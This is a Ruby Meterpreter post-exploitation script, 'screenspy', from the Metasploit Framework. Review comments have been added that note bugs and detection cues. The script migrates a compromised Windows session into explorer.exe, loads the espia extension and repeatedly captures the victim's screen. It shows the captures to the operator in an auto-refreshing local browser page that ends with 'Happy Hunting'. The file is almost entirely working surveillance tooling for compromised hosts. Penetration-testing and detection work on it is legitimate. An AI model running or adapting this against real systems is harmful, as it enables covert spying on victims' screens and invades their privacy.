GitHub Repository: rapid7/metasploit-framework
Path: blob/master/scripts/meterpreter/screenspy.rb
##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
# Author:Roni Bachar (@roni_bachar) [email protected]
#
# This script will open an interactive view of remote hosts
# You will need firefox installed on your machine
require 'fileutils'
# Switches understood by the script, in the form
#   flag => [takes a value?, help text]
opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "Help menu." ],
  "-d" => [ true, "The Delay in seconds between each screenshot." ],
  "-t" => [ true, "The time to run in sec." ],
  "-s" => [ true, "The local system linux/windows" ]
)

# Defaults, used for every switch the operator does not pass.
freq = 3                       # seconds to sleep between captures (-d)
count = 10                     # value of -t (see the note below)
file = "screenshot.jpeg"
meter_type = client.platform   # platform reported by the session
localsys = "linux"             # OS of the machine running the console (-s)

# NOTE(review): later in this script `count` is the number of capture
# iterations, with a sleep of `freq` seconds between them, so the total run
# time is roughly count * freq rather than "-t seconds" as the help text and
# the second usage example suggest.
# NOTE(review): -d and -t go through to_i with no range check (for String
# input, non-numeric text becomes 0 and a negative number is accepted), and any
# -s value other than "windows" ends up on the Linux path further down.
opts.parse(args) do |opt, _idx, val|
  case opt
  when '-d' then freq = val.to_i
  when '-t' then count = val.to_i
  when '-s' then localsys = val.to_s
  when "-h"
    # Print the banner, the usage examples and the generated option list,
    # then end the script.
    print_line
    print_line "Screenspy v1.0"
    print_line "--------------"
    print_line
    print_line
    print_line "Usage: bgrun screenspy -t 20 -d 1 => will take interactive Screenshot every sec for 20 sec long."
    print_line "Usage: bgrun screenspy -t 60 -d 5 => will take interactive Screenshot every 5 sec for 1 min long."
    print_line "Usage: bgrun screenspy -s windows -d 1 -t 60 => will take interactive Screenshot every 1 sec for 1 min long, windows local mode."
    print_line
    print_line "Author:Roni Bachar (@roni_bachar) [email protected]"
    print_line(opts.usage)
    raise Rex::Script::Completed
  end
end
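# Reports that the session's Meterpreter platform is not supported by this
# script and then stops the script.
#
# @param meter [String] platform name shown in the error message; defaults to
#   the platform of the current session
# @raise [Rex::Script::Completed] always, to end the script after the message
def wrong_meter_version(meter = client.platform)
  # The default used to be the script-level local `meter_type`. A `def` body
  # opens a new scope, so that local is not visible here and a call without an
  # argument raised NameError. Reading the platform from the session gives the
  # same value.
  # NOTE(review): relies on `client` being callable as a method from inside a
  # def, as it is at script level.
  print_error("#{meter} version of Meterpreter is not supported with this Script!")
  raise Rex::Script::Completed
end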
# Platform gate: anything other than a 'windows' Meterpreter ends the script.
wrong_meter_version(meter_type) unless meter_type == 'windows'
session = client

host = session.session_host
port = session.session_port
print_status("New session on #{host}:#{port}...")

# Captures and the viewer page are kept under
# <install_root>/logs/screenshot/<host>.
# NOTE(review): `host` is used unmodified as a directory name, and what gets
# written there is screen content from the remote machine. Treat the directory
# as sensitive engagement data (access control, retention, cleanup).
logs = ::File.join(Msf::Config.install_root, 'logs', 'screenshot', host)

# NOTE(review): `outfile` is not read anywhere in the visible part of the
# script.
outfile = ::File.join(Msf::Config.log_directory, file)

::FileUtils.mkdir_p(logs)
# Walk the remote process list and migrate the session into each entry that
# passes the name test below. Any error in here is reported and the script
# carries on.
# For detection purposes, the observable choices in this block are the fixed
# target process name and the call to core.migrate.
begin
  process2mig = "explorer.exe"

  mypid = session.sys.process.getpid
  session.sys.process.get_processes.each do |entry|
    # NOTE(review): the test asks whether the lower-cased process name occurs
    # inside "explorer.exe", not the other way round, so any name that is a
    # substring of it passes as well. The loop also keeps running after a
    # migration, and `mypid` is not refreshed.
    next unless process2mig.index(entry['name'].downcase) && entry['pid'] != mypid

    print_status("#{process2mig} Process found, migrating into #{entry['pid']}")
    session.core.migrate(entry['pid'].to_i)
    print_status("Migration Successful!!")
  end
rescue
  # Bare rescue: StandardError and its subclasses only.
  print_status("Failed to migrate process!")
end
# Capture loop and local viewer.
#
# Loads the "espia" extension, writes a small auto-refreshing HTML page next to
# the capture file, opens that page in a local Firefox, then overwrites
# screenshot.jpeg once per iteration. When the loop ends (or fails) the page is
# rewritten with an "ended" notice.
begin
  session.core.use("espia")

  begin
    # Viewer page: reloads itself every second and always shows the same
    # file, so only the most recent capture is ever on disk.
    viewer_html = "<title>#{host}</title><img src='file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/screenshot.jpeg' width='500' height='500'><meta http-equiv='refresh' content='1'>"
    path1 = File.join(logs, "video.html")
    File.open(path1, 'w') { |page| page.puts(viewer_html) }

    # NOTE(review): both command lines are handed to system as one string, so
    # a shell on the operator's machine interprets them, and `host` and
    # install_root are interpolated without escaping. An argument-vector call
    # would avoid the shell.
    if localsys == "windows"
      print_status("Running in local mode => windows")
      print_status("Opening Interactive view...")
      localcmd = "start firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html\""
    else
      print_status("Running in local mode => Linux")
      print_status("Opening Interactive view...")
      localcmd = "bash firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html\""
    end

    system(localcmd)

    count.times do |n|
      # No delay before the first capture, `freq` seconds before each later one.
      sleep(freq) unless n.zero?
      frame_path = File.join(logs, "screenshot.jpeg")
      frame = session.espia.espia_image_get_dev_screen
      next unless frame

      ::File.open(frame_path, 'wb') do |fd|
        fd.write(frame)
        fd.close # redundant with the block form, kept as in the original
      end
    end
  rescue ::Exception => e
    # NOTE(review): ::Exception is wider than StandardError (it includes
    # Interrupt and SystemExit), so an operator interrupt lands here too.
    print_status("Interactive Screenshot Failed: #{e.class} #{e} #{e.backtrace}")
  end

  print_status("The interactive Session ended...")
  closing_html = <<-EOS
<title>#{host} - Interactive Session ended</title>
<img src='file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/screenshot.jpeg' width='500' height='500'>
<script>alert('Interactive Session ended - Happy Hunting')</script>
  EOS
  # The last capture stays on disk and is still referenced by this page.
  File.open(path1, 'w') { |page| page.puts(closing_html) }
rescue ::Exception => e
  print_status("Exception: #{e.class} #{e} #{e.backtrace}")
end